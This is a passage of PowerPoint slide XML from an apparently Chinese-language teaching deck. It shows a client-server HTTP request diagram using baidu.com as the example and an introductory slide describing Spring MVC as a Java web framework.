                <a:gd name="T85" fmla="*/ 279 h 442"/>
                <a:gd name="T86" fmla="*/ 0 w 404"/>
                <a:gd name="T87" fmla="*/ 279 h 442"/>
                <a:gd name="T88" fmla="*/ 2 w 404"/>
                <a:gd name="T89" fmla="*/ 304 h 442"/>
                <a:gd name="T90" fmla="*/ 4 w 404"/>
                <a:gd name="T91" fmla="*/ 329 h 442"/>
                <a:gd name="T92" fmla="*/ 4 w 404"/>
                <a:gd name="T93" fmla="*/ 329 h 442"/>
                <a:gd name="T94" fmla="*/ 23 w 404"/>
                <a:gd name="T95" fmla="*/ 352 h 442"/>
                <a:gd name="T96" fmla="*/ 46 w 404"/>
                <a:gd name="T97" fmla="*/ 373 h 442"/>
                <a:gd name="T98" fmla="*/ 71 w 404"/>
                <a:gd name="T99" fmla="*/ 390 h 442"/>
                <a:gd name="T100" fmla="*/ 98 w 404"/>
                <a:gd name="T101" fmla="*/ 407 h 442"/>
                <a:gd name="T102" fmla="*/ 127 w 404"/>
                <a:gd name="T103" fmla="*/ 419 h 442"/>
                <a:gd name="T104" fmla="*/ 159 w 404"/>
                <a:gd name="T105" fmla="*/ 429 h 442"/>
                <a:gd name="T106" fmla="*/ 190 w 404"/>
                <a:gd name="T107" fmla="*/ 438 h 442"/>
                <a:gd name="T108" fmla="*/ 223 w 404"/>
                <a:gd name="T109" fmla="*/ 442 h 442"/>
                <a:gd name="T110" fmla="*/ 223 w 404"/>
                <a:gd name="T111" fmla="*/ 442 h 442"/>
                <a:gd name="T112" fmla="*/ 223 w 404"/>
                <a:gd name="T113" fmla="*/ 432 h 442"/>
                <a:gd name="T114" fmla="*/ 223 w 404"/>
                <a:gd name="T115" fmla="*/ 43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4" h="442">
                  <a:moveTo>
                    <a:pt x="223" y="432"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="223" y="432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223" y="404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231" y="352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236" y="327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244" y="302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252" y="277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261" y="254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273" y="234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286" y="211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298" y="192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329" y="154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348" y="138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386" y="106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404" y="94"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404" y="94"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371" y="52"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256" y="109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59" y="90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46" y="109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23" y="352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46" y="373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71" y="390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127" y="419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159" y="429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190" y="438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223" y="442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223" y="442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223" y="432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223" y="432"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="1A3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24752" y="4008125"/>
            <a:ext cx="731455" cy="731455"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="51" name="直线箭头连接符 50"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484470" y="4438623"/>
            <a:ext cx="1771010" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3810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p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4433173" y="4282776"/>
            <a:ext cx="1261351"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p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4474340" y="4523515"/>
            <a:ext cx="1179015"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6" name="图片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839" y="3647776"/>
            <a:ext cx="1270000" cy="1270000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="文本框 56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4352015" y="3934578"/>
            <a:ext cx="1745656" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>返回响应结果</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="文本框 57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4352015" y="4615745"/>
            <a:ext cx="1817114" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>向</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>baidu</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>服务器发送请求</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="文本框 58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1510719" y="3934578"/>
            <a:ext cx="1630678" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>www.baidu.com</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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2381" y="3563080"/>
            <a:ext cx="1270000" cy="1270000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="68" name="直线箭头连接符 67"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7848090" y="4261676"/>
            <a:ext cx="1261351"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p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7930426" y="4452680"/>
            <a:ext cx="1179015"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8001711" y="3883682"/>
            <a:ext cx="954107" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>数据库交互</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="72" name="直线箭头连接符 71"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3970489" y="3246806"/>
            <a:ext cx="0" cy="687772"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3810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 name="图片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817" y="1544180"/>
            <a:ext cx="3695633" cy="1681436"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="流程 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1521140" y="1452709"/>
            <a:ext cx="4489738" cy="4247735"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess">
            <a:avLst/>
          </a:pr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流程 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6175583" y="1452708"/>
            <a:ext cx="4489738" cy="4247735"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess">
            <a:avLst/>
          </a:pr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文本框 77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3682888" y="5891446"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="文本框 78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2814208" y="5800006"/>
            <a:ext cx="1107996" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>客户端</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="文本框 79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7245515" y="5800006"/>
            <a:ext cx="1107996" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务端</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>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7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7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71" grpId="0"/>
      <p:bldP spid="76" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="77" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="79" grpId="0"/>
      <p:bldP spid="8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SpringMVC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="782320" y="1654698"/>
            <a:ext cx="10515600" cy="3548603"/>
            <a:chOff x="782320" y="1654698"/>
            <a:chExt cx="10515600" cy="3548603"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="782320" y="1654698"/>
              <a:ext cx="10515600" cy="3548603"/>
              <a:chOff x="920209" y="1823315"/>
              <a:chExt cx="10311362" cy="3548603"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="矩形: 对角圆角 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920209" y="1823317"/>
                <a:ext cx="10311362" cy="3548601"/>
              </a:xfrm>
              <a:prstGeom prst="round2DiagRect">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 4761"/>
                  <a:gd name="adj2" fmla="val 4001"/>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40000" bIns="180000" rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="360045" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="l"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:cs typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>介绍：</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>Spring MVC</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>是</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>Spring Framework</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>的一部分，是基于</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>Java</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>实现</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>MVC</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>的轻量级</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>Web</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>框架</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:cs typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>。</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="360045" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="l"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:cs typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>官网：</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:cs typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:hlinkClick r:id="rId1"/>
                  </a:rPr>
                  <a:t>https://</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="262626"/>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:hlinkClick r:id="rId2"/>
                  </a:rPr>
                  <a:t> spring.io</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="262626"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="360045" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="l"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
